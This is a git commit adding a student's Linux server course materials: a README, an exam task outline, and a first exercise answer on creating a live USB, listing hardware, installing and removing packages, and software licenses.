commit c56fbe98ff21b196589287bec1d64a8938a49d38 Author: Fincer Date: Wed Aug 15 11:10:49 2018 +0300 Initial commit diff --git a/README.md b/README.md new file mode 100644 index 0000000..eb4ca21 --- /dev/null +++ b/README.md @@ -0,0 +1,16 @@ +README - Basics of setting up a single Linux server/client environment +============== + +- This repository is related to single-server/client Linux (server) environments. + +- This repository, as for now, doesn't contain any advanced set-up & maintenance instructions for multi-client/server environment techniques such as Puppet or Salt. + +- This repository doesn't contain instructions to set up containers, such as Docker or Systemd-nspawn. + +- The repository is mainly set up as a requirement by a school cource in Haaga-Helia University of Applied Sciences, Helsinki, Finland. + +- The repository contains various exercises, originally presented in Finnish but translated into English due to practical purposes. + +- All bourne shell files (sh) presented in this repository are not directly related to the exercises but they are useful in some situations. + +- **NOTE!** Instructions in this repository may not directly apply to your setting. The instructions have not been tested in a production environment, so if you decided to use them in your system configuration, you should apply them with care. I do not take any responsibility in a case of failure or broken system configurations. diff --git a/exercises/exam.md b/exercises/exam.md new file mode 100644 index 0000000..73dee7e --- /dev/null +++ b/exercises/exam.md @@ -0,0 +1,35 @@ +0) Check critical commands + +1) Set up SSH & Apache + + - Test SSH + - Harden SSH login policy + - Customize SSH port (get ssh port from a separate variable) + - Use public key authentication method + + - Test Apache + - Remove Apache default site + - Strict Apache security policy + - Apply custom patch to the source code + + - Remove root login + - Restrict root accessibility + + - Add a default user with sudo permissions + - Enable userdir for this new user + +2) Set up PHP, phpMyAdmin & MySQL + + - Set Apache PHP environment (get php version from a separate variable) + - Set MySQL database + - Configure phpMyAdmin + +3) Set up firewall configuration with ufw + +4) Set up a PHP website that takes user input and writes it into MySQL database + +5) Set up and install Wordpress + + - Points to different DNS (/etc/hosts) + +6) Check /var/log/auth.log for any suspicious SSH login attempts diff --git a/exercises/h1.md b/exercises/h1.md new file mode 100644 index 0000000..67e6f41 --- /dev/null +++ b/exercises/h1.md @@ -0,0 +1,438 @@ +Linux servers - Exercice 1 +============== + +*Disclaimer:* +-------------- + +This exercise is a part of [Linux servers (ICT4TN021, spring 2018) // Linux-palvelimet (ICT4TN021, kevät 2018)](http://www.haaga-helia.fi/fi/opinto-opas/opintojaksokuvaukset/ICT4TN021) school course organized as a part of Information Technology studies in Haaga-Helia university of Applied Sciences, Helsinki, Finland. Course lecturer [Tero Karvinen](http://terokarvinen.com/) has defined the original assignment descriptions in Finnish presented in this document in English. Answers and translations have been written by Pekka Helenius (me, ~ Fincer). + +**a)** Create your own Linux USB live stick. Try it out on a non-school computer. This section does not require installation of Linux. However, if you decided to install Linux, you should take proper backups first. +-------------- + +**Answer:** I did this with [Rufus Windows application](https://rufus.akeo.ie/) on Microsoft Windows 7 which was run inside [Oracle VirtualBox](https://fi.wikipedia.org/wiki/VirtualBox) as a virtual machine. Alternative methods include [UNetbootin](https://unetbootin.github.io/), [ISO Image Writer](https://github.com/KDE/isoimagewriter) or dd command (default location on Linux: /usr/bin/dd) which is a part of [Coreutils](http://www.gnu.org/software/coreutils/coreutils.html). Rufus allows you to create a live USB stick using either ISO or DD method which differ from each other, as the developer has explained [on his GitHub site](https://github.com/pbatard/rufus/issues/843#issuecomment-255680876). + +Let's take a detailed look for two of these approaches: Rufus on Windows 7 and dd command on Linux (any Linux distribution applies here). + +**Alternative 1 - Rufus (Windows, GUI-based)** + +You can use either Windows 7 or 10 (any student/enterprise/server subversion applies here). You can run Windows either in a virtual machine or as physically installed in your mass media storage (SSD/HDD). Whichever method you choose to run Windows, it doesn't really matter. The most important part is that you have a working operating system. + +1. Launch Microsoft Windows +2. Download Rufus application from [here](https://rufus.akeo.ie/), under the title "Download" +3. You can use either portable or installable version of Rufus. In the following example, we use portable version v. 2.18. +4. Download any Linux distribution you prefer. In further parts, Debian-based Ubuntu 16.04.3 LTS is used. What comes to alternative download methods, you can choose either ISO image file (downloaded directly from servers) or distributed torrent method. Torrent method usually requires a client application (such as [Transmission](https://transmissionbt.com/download/)) to work correctly. The Linux distribution of choice can be anything you prefer in your working environment and which requirements you have set up for your Linux server environment. +Let's download a widely used Xubuntu 16.04.3 LTS (x86_64 processor architecture), which is based on Ubuntu 16.04.3 LTS but uses XFCE desktop environment instead of Unity. In Ubuntu version syntax, 16 refers to release year (2016), 04 refers to release month (April), 3 is subversion and LTS stands for Long-Term Support (preferred in server environments). + +[Xubuntu 16.04.3 LTS - Torrent download](http://cdimage.ubuntu.com/xubuntu/releases/16.04.3/release/xubuntu-16.04-desktop-amd64.iso.torrent) +[Xubuntu 16.04.3 LTS - ISO image file directly from a server - 1.2G](http://cdimage.ubuntu.com/xubuntu/releases/16.04.3/release/xubuntu-16.04-desktop-amd64.iso) + +**Comparing checksums:** + +If you wanted to make sure the ISO image you just downloaded is valid, you should check its checksum (mainly for security reasons). In this way you make sure that no malicious party has altered the image you trust and the download process has succeeded. You should take a closer look on sha256sum and md5sum values of your ISO image file. The value must match the one which is published on the Ubuntu download site ([sha256sum](http://cdimage.ubuntu.com/xubuntu/releases/16.04.3/release/SHA256SUMS), [md5sum](http://cdimage.ubuntu.com/xubuntu/releases/16.04.3/release/MD5SUMS)). + +On Linux: check checksums with commands *sha256sum xubuntu-16.04-desktop-amd64.iso* and *md5sum xubuntu-16.04-desktop-amd64.iso* + +On Windows: Use [Microsoft File Checksum Integrity Verifier](https://www.microsoft.com/en-us/download/details.aspx?id=11533) or check a CertUtil-based solution [given on superuser.com](https://superuser.com/questions/245775/is-there-a-built-in-checksum-utility-on-windows-7/898377#898377) + + +**NOTE:** Checking checksums is highly recommended. For instance, Linux Mint network servers were hacked due to outdated server software in 2016, resulting to maliciously injected ISO images uploaded by hostile attackers. In addition, the Linux Mint forum software was affected, as well (user credentials leaked). More about the incident is explained [on Linux Mint blog](https://blog.linuxmint.com/?p=2994). + +5. Plug in an empty and large enough USB stick into your computer (4GiB should be sufficient). It is highly recommended that you have formatted the stick in advance because Rufus overwrites any existing files existing in the USB stick in order to place required Linux files in the stick. If your stick contained any important files, they should be moved from the stick to somewhere safe location before proceeding here. + +6. Once the stick is emptied (and probably formatted), launch Rufus application. Select the USB stick as a target device in *Device* menu. All other settings can be left in their default values. Choose downloaded Xubuntu 16.04.3 LTS ISO image file from the dropdown menu located at the right of *Create a bootable disk using* part. The dropdown menu is presented as a disc icon without any texts. + +7. Click *Start*, choose ISO method as a writing method once asked. Read the warnings. If all steps have been successfully accomplished so far, proceed with the writing operation. + +8. Wait until the ISO image file has been written into the USB stick. Once done, reboot your computer with the USB stick attached. Immediately the computer has rebooted, press a button which you can access your BIOS/UEFI/Boot options menu with. Choose the Xubuntu 16.04.3 LTS USB stick (which should appear in the boot list). Start the operating system boot-up process bt selecting *Try without installing* option (this step varies between Linux distribution. More generally, you can also choose *Install * option and select installation on the live USB Linux desktop environment). Wait until the operating system has been booted up. Start installation and follow the instructions. + +The installation process is not defined in detail here because installation steps varies from Linux distribution to distribution. However, basic principle is to install the operating system with good and strong passwords. Encrypted home folder or HDD/SSD partition options should also be considered. After you have successfully installed Linux, detach the live USB stick and reboot your computer. You should be able to access the installed Linux distribution without the USB stick. + +When writing and applying passwords, please pay attention to correct keyboard layouts. In my case, I use a Swedish (Finnish) keyboard layout which differs from the default en_US layout. Therefore, mistyping characters can easily happen. Many Linux distributions allow you to change the keyboard layout during the installation process. Unless you're not able to do it in installation window, you can change the keyboard layout temporarily by executing *setxkbmap fi* in a local shell environment (NOTE: graphical environment is required since the command is a part of graphical X11 environment!). You can open up a local shell by opening a terminal emulator while running Linux from your USB stick. NOTE: changing passwords must be done before writing them in the installation steps! + +**Alternative 2 - dd command (Linux, CLI-based)** + +In case you use any Unix-based operating system (Linux, GNU/Linux, Apple MacOS, FreeBSD), you can create a USB live stick by using shell-based dd command. This method does not require a graphical desktop environment. **NOTE!** Commands on Apple MacOS may not be exactly equal to Linux ones if you use extra parameters in the following commands. + +The following instructions assume that you have only a command line environment and you have a working network connection. + +1. At first, you need to download an ISO image of your Linux distribution of choice. There are usually two options: download ISO image from a centralized server or download ISO image using torrent protocol. In the following steps, we download Xubuntu 16.04.3 LTS (x86_64). + +a. Centralized server: +- requires that *wget command* exists in the system +- download the ISO image with the command: + +``` +wget --directory-prefix=$HOME --show-progress http://cdimage.ubuntu.com/xubuntu/releases/16.04.3/release/xubuntu-16.04-desktop-amd64.iso +``` + +b. Torrent download: +- requires that *transmission-cli command* exists in the system +- download the ISO image with the command: + +``` +transmission-cli -w $HOME http://cdimage.ubuntu.com/xubuntu/releases/16.04.3/release/xubuntu-16.04-desktop-amd64.iso.torrent +``` + +2. Plug in an empty and large enough USB stick into your computer (4GiB should be sufficient). It is highly recommended that you have formatted the stick in advance but you can format the stick with *fdisk* command, as well ([util-linux](https://www.kernel.org/pub/linux/utils/util-linux/)). When using fdisk, please follow [these instructions](https://www.cyberciti.biz/faq/linux-how-to-delete-a-partition-with-fdisk-command/), for example. In case you have important files to be copied from your USB stick, copy the files with the following command sequence. We assume that the stick is not yet mounted on the system. Command sequence is expected to be executed with the default user (UID = 1000) which belongs to the default user group (GID = 1000). Correct USB stick device name and partition number (*/dev/XdYZ*) must be find out in advance by executing command *sudo fdisk -l*. Y stands for the device's alphabetical ID, Z stands for partition number (*/dev/sda1*, for example). X can have value *h* (IDE-based HDD/SSD's) or *s* (SATA-based HDD/SSD's). Newer NVMe-based storage solutions such as Samsung EVO series 860/960 use syntax */dev/nvme0n1p1* in which 1 stands for the device number and *p1* stands for the partition number. + +``` +sudo mkdir -p /mnt/livestick && \ +mkdir $HOME/livestick-backup && \ +sudo mount /dev/sdXY /mnt/livestick && \ +sudo mv /mnt/livestick/* $HOME/livestick-backup/ && \ +sudo chown -R 1000:1000 $HOME/livestick-backup +``` + +**NOTE:** If you have any USB stick partitions mounted already on the system, you should **not** use */mnt/livestick** location in above commands. Instead, use the path you can extract for the correct USB stick partition with command *mount*. + +3. When you have backed up your important files earlier stored in the USB stick, you have confirmed the USB stick is empty and you have successfully downloaded your Linux distribution ISO image, you can start proceeding with the writing operations. + +**NOTE!** You must be extra careful with dd command. If used wrongly, the command can destroy any data you have in your HDD/SSD or in any storage device. Recovering files is a headache and you really don't want to end up having one! One key principle is to triple check all locations given for the dd command and check that used locations are in correct places (so that input and output operations are being executed for correct devices and the devices don't mix up). + +4. Let's begin with Xubuntu 16.04.3 LTS USB writing operations. In this section we assume that you have successfully downloaded the ISO image and you definitely know the correct path for your USB stick device (syntax: /dev/sda). **NOTE!** I don't refer to USB stick partition path (syntax: /dev/sda1). The device path syntax is as stated: */dev/sda*, */dev/sdb*, etc. dd command is executed as the root user (Linux main user/super user). dd command doesn't confirm the command syntax is correct so you must write it correctly in the beginning. If you are not sure about the correct syntax, please contant an expert. + +The command syntax (NOTE: not likely the exact command in your environment!) is as follows: + +``` +sudo dd status=progress if=$HOME/xubuntu-16.04-desktop-amd64.iso of=/dev/sdb +``` + +where /dev/sdb is your USB stick as seen on Linux system. **Use correct, your exact device identifier instead of the one shown above**. + +If you want more instructions how to use the 'dd' command, it is recommended to read the following wiki, for example: [Wikipedia - dd (Unix)](https://en.wikipedia.org/wiki/Dd_(Unix)) + +5. Wait until the ISO image file has been written into the USB stick. Once done, reboot your computer with the USB stick attached. Immediately the computer has rebooted, press a button which you can access your BIOS/UEFI/Boot options menu with. Choose the Xubuntu 16.04.3 LTS USB stick (which should appear in the boot list). Start the operating system boot-up process bt selecting *Try without installing* option (this step varies between Linux distribution. More generally, you can also choose *Install * option and select installation on the live USB Linux desktop environment). Wait until the operating system has been booted up. Start installation and follow the instructions. + +The installation process is not defined in detail here because installation steps varies from Linux distribution to distribution. However, basic principle is to install the operating system with good and strong passwords. Encrypted home folder or HDD/SSD partition options should also be considered. After you have successfully installed Linux, detach the live USB stick and reboot your computer. You should be able to access the installed Linux distribution without the USB stick. + +When writing and applying passwords, please pay attention to correct keyboard layouts. In my case, I use a Swedish (Finnish) keyboard layout which differs from the default en_US layout. Therefore, mistyping characters can easily happen. Many Linux distributions allow you to change the keyboard layout during the installation process. Unless you're not able to do it in installation window, you can change the keyboard layout temporarily by executing *setxkbmap fi* in a local shell environment (NOTE: graphical environment is required since the command is a part of graphical X11 environment!). You can open up a local shell by opening a terminal emulator while running Linux from your USB stick. NOTE: changing passwords must be done before writing them in the installation steps! + +**b)** List hardware components of your new Linux computer (*sudo lshw -short -sanitize*). +-------------- + +**Answer:** *sudo lshw -short -sanitize* gives the following information (assuming that you have package *lshw* installed and proper commands *sudo* and *lshw* are available on the system): + +Detailed comments about the listed devices have been included after each terminal output line (therefore, the output is not exactly as written by the command to stdout/output). + +H/W path Device Class Description + +- system N56JR (ASUS-NotebookSKU) +- /0 busN56JR +**Comment:** *Computer manufacturer & model identifier* +- /0/0 memory 64KiB BIOS +**Comment:** *Memory size of motherboard's BIOS firmware, 64 kibibytes* +- /0/8 processor Intel(R) Core(TM) i7-4700HQ CPU @ 2.40GHz +**Comment:** *Processor manufacturer, model and clock rate* +- /0/8/9 memory 1MiB L2 cache +**Comment:** *Level 2 cache of the processor, size of 1 mebibytes* +- /0/8/a memory 256KiB L1 cache +**Comment:** *Level 1 cache of the processor, size of 256 kibibytes* +- /0/8/b memory 6MiB L3 cache +**Comment:** *Level 3 cache of the processor, size of 6 mebibytes* +- /0/c memory 16GiB System Memory +**Comment:** *Installed computer RAM memory size in gibibytes* +- /0/c/0 memory 8GiB DIMM DDR3 Synchronous 1600 MHz (0.6 ns) +**Comment:** *Information of RAM module 0. DIMM (dual in-line memory module), DDR3 (Double Data Rate 3), clock rate 1600 megahertz, latency 0.6 nano seconds* +- /0/c/1 memory DIMM [empty] +**Comment:** *Information of RAM module 1. Empty* +- /0/c/2 memory 8GiB DIMM DDR3 Synchronous 1600 MHz (0.6 ns) +**Comment:** *Same than RAM module 0 desribed above* +- /0/c/3 memory DIMM [empty] +**Comment:** *Information of RAM module 3. Empty* +- /0/100 bridge Xeon E3-1200 v3/4th Gen Core Processor DRAM Controller +**Comment:** *Memory bus controller information. Processor family Xeon E3-1200. So called main controller for any device below in tree* +- /0/100/1 bridge Xeon E3-1200 v3/4th Gen Core Processor PCI Express x16 Controller +**Comment:** *PCIe x16 bus controller* +- /0/100/1/0 displayGK106M [GeForce GTX 760M] +**Comment:** *Graphics Card Gerforce GTX 760M, belonging to PCIe x16 bus* +- /0/100/2 display4th Gen Core Processor Integrated Graphics Controller +**Comment:** *Secondary Graphics adapter (integrated).* +- /0/100/3 multimedia Xeon E3-1200 v3/4th Gen Core Processor HD Audio Controller +**Comment:** *Audio controller belonging to Intel Xeon E3-1200 family* +- /0/100/16 communication 8 Series/C220 Series Chipset Family MEI Controller #1 +**Comment:** *[Intel Management Engine Interface -kontrolleri](https://www.kernel.org/doc/Documentation/misc-devices/mei/mei.txt)* +- /0/100/1a bus8 Series/C220 Series Chipset Family USB EHCI #2 +**Comment:** *[Enhanced Host Controller Interface](https://en.wikipedia.org/wiki/Host_controller_interface_(USB,_Firewire)) of Intel C220- chipset family number 2 for USB gateways* +- /0/100/1a/1usb1busEHCI Host Controller +**Comment:** *Host controller for the above mentioned device* +- /0/100/1a/1/1 busUSB hub +**Comment:** *[USB extension hub](https://en.wikipedia.org/wiki/USB_hub) splitted to multiple gates* +- /0/100/1a/1/1/1communication Bluetooth USB Host Controller +**Comment:** *Bluetooth controller* +- /0/100/1a/1/1/3multimedia ASUS USB2.0 Webcam +**Comment:** *ASUS USB-based web camera* +- /0/100/1b multimedia 8 Series/C220 Series Chipset High Definition Audio Controller +**Comment:** *Audio controller of C220 chipset* +- /0/100/1c bridge 8 Series/C220 Series Chipset Family PCI Express Root Port #1 +**Comment:** *Port which operates at motherboard's North Bridge, making it possible to use PCIe devices, to track their hierarchy and opening up communication channels between them ([source](https://www.techwalla.com/articles/what-is-a-pci-express-root-port))* +- /0/100/1c.2bridge 8 Series/C220 Series Chipset Family PCI Express Root Port #3 +**Comment:** *Equal to the previous device* +- /0/100/1c.2/0 wlan0 networkAR9485 Wireless Network Adapter +**Comment:** *WLAN network adapter Atheros AR9485. Interface identifier wlan0 which is seen by the OS commands (can be altered via changing Linux kernel boot parameters in grub/syslinux configuration files) +- /0/100/1c.3bridge 8 Series/C220 Series Chipset Family PCI Express Root Port #4 +- /0/100/1c.3/0 eth0networkRTL8111/8168/8411 PCI Express Gigabit Ethernet Controller +**Comment:** *Ethernet controller RealTek 8111/8168/8411. Interface identifier eth0, which can be checked by using *ifconfig command*, for example +- /0/100/1c.4bridge 8 Series/C220 Series Chipset Family PCI Express Root Port #5 +- /0/100/1c.4/0 genericRTS5227 PCI Express Card Reader +**Comment:** *RealTek RTS5227 PCIe card reader* +- /0/100/1d bus8 Series/C220 Series Chipset Family USB EHCI #1 +**Comment:** *[Enhanced Host Controller Interface](https://en.wikipedia.org/wiki/Host_controller_interface_(USB,_Firewire)) of Intel C220 chipset family number 1 for USB gateways* +- /0/100/1d/1usb2busEHCI Host Controller +**Comment:** *Host controller for the above mentioned device* +- /0/100/1d/1/1 busUSB hub +**Comment:** *[USB extension bus](https://en.wikipedia.org/wiki/USB_hub) splitted to multiple gates* +- /0/100/1d/1/1/2busHighSpeed Hub +**Comment:** *Centralization of high speed bus* +- /0/100/1d/1/1/2/3 input USB-PS/2 Optical Mouse +**Comment:** *Optical HID mouse device attached to USB bus* +- /0/100/1d/1/1/2/4 input Logitech Illuminated Keyboard +**Comment:** *HID keyboard device attached to USB bus* +- /0/100/1f bridge HM86 Express LPC Controller +**Comment:** *[Low Pin Count controller](https://en.wikipedia.org/wiki/Low_Pin_Count) which attaches all low-level legacy devices to the motherboard* +- /0/100/1f.2storage8 Series/C220 Series Chipset Family 6-port SATA Controller 1 [AHCI mode] +**Comment:** *SATA controller of C220 chipset family for SATA-based mass media storage inputs* +- /0/100/1f.3bus8 Series/C220 Series Chipset Family SMBus Controller +**Comment:** *Power management [System Management Bus controller](https://en.wikipedia.org/wiki/System_Management_Bus)* + +P.S. If you frequently listed your hardware on a Linux computer, you should consider creating a *bash alias command* for this purpose (assuming your default shell environment is bash). Basic idea is to simplify commands you need to type each time you want to do something. For listing hardware, write a the following in your _$HOME/.bashrc_ file (it's a hidden file): +``` +alias listhw='sudo lshw -short -sanitize' +``` + +Next time you launch a bash shell session, you should be able to list your hardware by simply executing command *listhw*, defined in your _$HOME/.bashrc_ file. + +If you want to create this command globally accessible for all users, you can write the above code in /etc/bash.bashrc file as root. Alternatively, create a file _/usr/bin/local/listhw_ as root with the following contents: +``` +#!/bin/bash + +sudo lshw -short -sanitize +``` + +Use command _sudo nano _/usr/bin/local/listhw_ for that. +The file is not executable by default. In order to make it executable, apply the following command: + +``` +sudo chmod +x /usr/bin/local/listhw +``` + +Alternative and additional commands to list hardware are *lspci* (list PCI devices), *hwinfo* (defailed output), *lsusb* (list USB devices). Availability of these commands vary and you may need to install extra packages in your Linux distribution. On Ubuntu, execute the following command: + +``` +sudo apt-get update && sudo apt-get install hwinfo pciutils usbutils +``` + +**c)** Install three new programs which are new to you. Try them out in their main target environment and primary use. +-------------- + +**Answer:** + +Let's install three new programs: *[Thunar](http://thunar.xfce.org/)* (file manager), *[Gedit](https://wiki.gnome.org/Apps/Gedit)* (text editor), *[GParted](http://gparted.sourceforge.net/)* (mass storage partition editor, alternative [GitHub link](https://github.com/GNOME/gparted) +) +**Thunar:** +![Thunar](https://winaero.com/blog/wp-content/uploads/2017/09/Thunar-in-XFCE4.png) + +Thunar is a user-friendly and easily understandable [GTK+-based](https://en.wikipedia.org/wiki/GTK+) file manager. It's not as customizable as [Qt-based](https://en.wikipedia.org/wiki/Qt_%28software%29) [Dolphin](https://www.kde.org/applications/system/dolphin/) but sufficient for daily basic usage. Thunar is the default file manager for [XFCE desktop environment](https://en.wikipedia.org/wiki/Xfce). + +**Gedit:** +![Gedit](http://mattbaker.eu/imgs/2017-08/10686759591_gedit-editor-for-windows.jpg) + +Gedit is a simple GTK+-based text editor, targeted to [GNOME desktop environment](https://en.wikipedia.org/wiki/GNOME). Alternative text editors are, for example, [Mousepad](https://github.com/codebrainz/mousepad), [Kate](https://www.kde.org/applications/utilities/kate/), [KWrite](https://www.kde.org/applications/utilities/kwrite/) and [Geany](https://en.wikipedia.org/wiki/Geany). + +**GParted:** +![GParted](http://intodarkness.eu/imgs/2017-08/23065514301_gparted-live-0-9-1-1-iso.jpg) + +GParted is a popular GTK+-based graphical front-end for CLI-based, GPL3-licensed [GNU Parted](http://www.gnu.org/software/parted/parted.html) back-end. Similar programs include a Qt-based [KDE Partition Manager](https://www.kde.org/applications/system/kdepartitionmanager/), targeted mainly to [KDE](https://en.wikipedia.org/wiki/Kde) and [LXQt](https://en.wikipedia.org/wiki/LXQt) desktop environments. + +**Installation of Thunar, Gedit and GParted on Debian-based distributions** + +**Via official package repositories:** +On Debian-based distributions (like Xubuntu), you can install the selected three programs with a single command, like: + +``` +sudo apt-get update && sudo apt-get install -y thunar gedit gparted +``` + +where _sudo apt-get update_ stands for "Update and synchronize package database list to correspond with newer available program versions", _&&_ stands for "If the previous command was successful, proceed with the following command", _sudo apt-get install -y_ stands for "Install the following packages without confirming (-y parameter)", and finally, _thunar gedit gparted_ stands for "Application names found in the available repositories listed in _/etc/apt/sources.list_ file and in files in _/etc/apt/sources.list.d/_ directory and which are parameters for _apt-get_ command". + +_sudo_ part before the forementioned commands stands for "Grant me temporary root privileges to execute the following commands as root". It is essential that the current user is in _sudo_ group and all members of group _sudo_ are allowed to gain temporary root privileges (uncomment line _%sudo ALL=(ALL) ALL_ in file _/etc/sudoers_ as root). + +By executing the above command, we assume that the system has established internet connection, [Dpkg](https://en.wikipedia.org/wiki/Dpkg) works as intended (it has not already locked file */var/lib/dpkg/lock*, for example) and no other installation process is being executed on. + +You can execute the command without sudo in root terminal, but accessing root terminal is not highly recommended in server environments. In root terminal, the command would be: + +``` +apt-get update && apt-get install -y thunar gedit gparted +``` + +You can search for any packages with *apt-cache search package-name* command. It may not be the primary approach but you can search for packages on official [Ubuntu repositories website](https://packages.ubuntu.com/) on Linux Ubuntu distributions (Xubuntu, Ubuntu, Lubuntu, Kubuntu, Ubuntu Bugdie and so on). Alternatively, you can also install packages with *aptitude* command if you have installed package *aptitude*. Command syntax for installing packages with aptitude is + +``` +sudo aptitude install package-name +``` + +**Via local packages or from source code:** + +If you consider installing local packages, keep in mind that you need to track all required package dependencies. This can easily lead to [Dependency hell](https://en.wikipedia.org/wiki/Dependency_hell) situation. Therefore, installing local packages suits best for commercial, separately distributed software which are bundled with their dependencies and can be installed out-of-the-box without worrying about dependencies. + +All installable packages on Debian-based Linux distributions are known as _deb packages_ with suffix _.deb_. Therefore, local packages can be installed with the following command: + +``` +sudo dpkg -i my-deb-package.deb +``` + +If any unsatisfied dependencies are present, you should do as usually instructed: + +``` +sudo apt-get -f install +``` + +Please note that this does not always work, can break your system and make things just too troublesome to sort out. For example, your program may depends on a previous version of a package which is already installed or your system or/and not available on the official repositories. Installing a previous version can seriously break your system. In some rare cases, packages can be offered with two versions where the older version is known as _compatibility package_, usually installing older library versions to your system, co-existing with newer ones. However, keep in mind that your _.deb_ package must be aware of this _compatibility version_ (so that it depends exactly on that compatibility version instead of the officially named one. This is just a naming issue). + +You can force package installation on the system, ignoring package dependencies. In this case, you **must** know what you're doing, and this approach is really not recommended for Linux novices. + +If you want to compile software directly from source, you essentially need *[dh_make](https://manpages.debian.org/jessie/dh-make/dh_make.8.en.html)* and *[dpkg-buildpackage](http://man7.org/linux/man-pages/man1/dpkg-buildpackage.1.html)* commands available on your Debian-based operating system. Usually *[cmake](https://cmake.org/)*, *[make](https://en.wikipedia.org/wiki/Make_(software))* and *gcc* ([GNU Compiler Collection](https://gcc.gnu.org/)) are required as well. Not forgetting any extra _build time dependencies_, usually marked with _-dev_ suffix (development headers) in Debian-based Linux distributions. _Runtime dependencies_ can be described in package description. + +Any package dependencies (buildtime or runtime) are defined in Debian control file which can be supplied with the package or you need to create and configure it by your own. + +On Ubuntu, you can install most essential and widely used build time tools with: + +``` +sudo apt-get install build-essential +``` + +if you considered installing a remotely available package directly from source, you should find out required runtime and buildtime dependencies with (assuming you have aptitude installed): + +``` +aptitude show package-name +``` + +where package-name is the package of your choice. Replace this string with the correct name, + +Additionally, you can investigate required dependencies by checking any header (_.h_) files required in C/C++ source files, if the program is based on these languages. By tracking down required headers it is possible to figure out required dependencies in some extent. In addition, check out official websites of the program (GitHub, BitBucket or another homepage), possibly contant the developer and/or check out any supplied library files (suffix is _.so_) and their dependencies with [ldd command](https://en.wikipedia.org/wiki/Ldd_%28Unix%29). On Ubuntu, you can also check out [packages.ubuntu.com](https://packages.ubuntu.com/) for dependencies if the package is available on official repositories. + +Please see my practical [example 1](PLACEHOLDER) and [example 2]() for compiling software on Linux. + +You can also apply patches directly to source code of a program by using [diff](https://www.gnu.org/software/diffutils/manual/html_node/Example-Unified.html) and [patch](https://en.wikipedia.org/wiki/Patch_%28Unix%29) commands. Patches must be applied before compiling the program. + +**Removal of packages:** + +You can effectively remove packages on Debian-based Linux distributions with: + +``` +sudo apt-get purge --remove package1 package2 package3 +``` + +In some cases, package manager suggests you to remove any orphaned packages with: + +``` +sudo apt-get autoclean +``` + +You can freely explore more _apt-get commands_ with: + +``` +apt-get --help +``` + +and by reading command-related manual page: + +``` +man apt-get +``` + +Manual pages in any commands are highly supported in multiple Linux distributions. The command syntax is always the same: _man my_command_. Additionally, _--help_ paremeter is widely accepted by many Unix/Linux CLI programs. + +**NOTE:** Although Linux distributions don't have any similar to Windows registry hell (unclean registry after software removal), keep in mind that any configuration files created _afterwards_ by a Linux program are not handled by Linux package managers. In other words: package managers can't track files created afterwards by your program. This is mostly a case with personal configuration files in user's home directory on Linux. In addition, any backup files (suffix: .old, ~, .bak, .pacnew...) are not included in the package according to your package manager and, therefore, they may not be uninstalled by simply removing a program. [Please see my script for tracking down those files]() + +**Other Linux distributions:** +Main differences between various Linux distributions are: + +- version modeling: For example, Arch Linux follows [rolling release model](https://en.wikipedia.org/wiki/Rolling_release) whereas Ubuntu follows [time based release model](https://wiki.ubuntu.com/TimeBasedReleases) + +- package managers: OpenSUSE uses [zypper](https://en.opensuse.org/Portal:Zypper), Fedora uses [dnf](https://lists.opensuse.org/opensuse-factory/2017-08/msg00369.html), Arch Linux uses [pacman](https://wiki.archlinux.org/index.php/pacman) + +- package configurations (configuration files, features available for a program by default) + +- compilation methods for source codes: For example, Arch Linux uses [makepkg](https://wiki.archlinux.org/index.php/makepkg), Ubuntu uses dpkg-buildpackage + +- package availability in official repositories: For example, some packages available on Arch Linux are not available on Ubuntu + +- package versioning syntax: For example, Arch Linux uses version 59.0.1-1 and Ubuntu uses 59.0.1 for a same package + +- package versions: For example, Arch Linux has newer package version in the official repositories than Ubuntu does. + +You can read more at [Arch Linux Wiki - Arch compared to other distributions](https://wiki.archlinux.org/index.php/arch_compared_to_other_distributions). + +**d)** What licenses have been used in the programs of your choice? Explain briefly which kind of rights and duties these licenses have. +-------------- + +**Answer:** + +License information can be retrieved from multiple various sources. Licensing terms have usually been mentioned in source code or documentation, help manual, program website or retriavable from equivalently trusted source. + +- Thunar is a part of Xfce project and licensed under GPL ([GNU General Public License](https://www.gnu.org/licenses/licenses.html#GPL)) and LGPL2.1 ([Lesser GNU General Public License](https://www.gnu.org/licenses/licenses.html#LGPL)). Detailed information about the licensing policy can be found on [Arch Linux package repository](https://www.archlinux.org/packages/extra/x86_64/thunar/), for example. + +- Gedit is a part of GNOME project and licensed under GPLv2. Licensing terms are mentioned in [Gedit source code](https://git.gnome.org/browse/gedit/tree/COPYING). + +- Gparted is a part of GNOME project and uses GPLv2+ license, according to [the official website](http://gparted.sourceforge.net/), bottom section. Exact statement is as follows: "GParted is distributed under the GNU General Public License version 2 or (at your option) any later version." + +GPL license is targeted to distribute free sofware under several terms. The license grants permission to use, copy, modify and share a program and its source code. License is accumulating in nature so that any program initially released under GPL and developed further source code must be published and any further restrictions to usage of the program are forbidden. License allows commercial usage of a program. More about the license on [GNU project homepage](https://www.gnu.org/licenses/quick-guide-gplv3.html) + +[LGPL license](https://en.wikipedia.org/wiki/GNU_Lesser_General_Public_License) differs from GPL license so that some non-GPL licensed component of a program can be linked to otherwise GPL-licensed program. Therefore, because the program is not fully open source, it can still use LGPL license but not GPL license. LGPL licensed program has less efficient [copyleft](https://en.wikipedia.org/wiki/Copyleft). + +**e)** List programs you use (MS Word, for example), purpose of these programs (for example, text editing) and introduce equivalent open source Linux program (for example, LibreOffice Writer). List closed source programs even if they do not have open source equivalent for Linux. +-------------- + +**Answer:** + +Syntax: Closed source program, open source program, purpose of the selected program + +- Adobe Photoshop - *Open source:* Krita, GIMP = **Image manipulation** +- Adobe Lightroom - *Open source:* Darktable, RawTheRapee, digikam = **Photo editing** +- Microsoft Media Player - *Open source:* VLC, mplayer = **Media player** +- Notepad - *Open source:* Kate, Leafpad, gedit = **Text editor** +- Windows File Manager - *Open source:* Nautilus, Thunar, Dolphin = **File manager** +- Autodesk 3DS Max - *Open source:* Blender = **3D editor** +- Microsoft Paint - *Open source:* KolourPaint = **Rasterized image editing** +- Skype - *Open source:* Pidgin Internet Messenger = **Chat** +- Microsoft Windows - *Open source:* Wine = **Operating system (note! this can be debated. ReactOS, too)** +- Windows Task Manager - *Open source:* KSysGuard, LXTask = **Process and system statistics manager** +- Microsoft Outlook - *Open source:* Thunderbird, Kmail = **Email client** +- Windows Volume Control - *Open source:* PulseAudio Volume Control & alsamixer = **Audio controlling** +- Windows Control Panel - *Open source:* KDE System Settings (systemsettings5) = **General settings of an operating system** +- Adobe Acrobat - *Open source:* Evince = **PDF document viewer** +- Windows Image Viewer - *Open source:* Gwenview = **Photo previewing** +- Microsoft Internet Explorer - *Open source:* Firefox, Palemoon, Konqueror = 